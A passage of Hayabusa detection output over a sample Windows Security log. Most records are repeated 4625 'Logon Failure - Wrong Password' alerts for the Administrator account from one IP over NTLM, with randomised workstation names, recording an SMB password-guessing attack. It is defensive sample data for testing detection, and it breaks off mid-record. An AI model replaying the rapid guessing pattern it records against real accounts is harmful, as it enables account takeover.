NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Z6lJc7DXAOcNZ2G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Olt5mS7na07VDJE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCFeQcUMDTs0ev8v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FYmH6CQrizoZ1DAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: 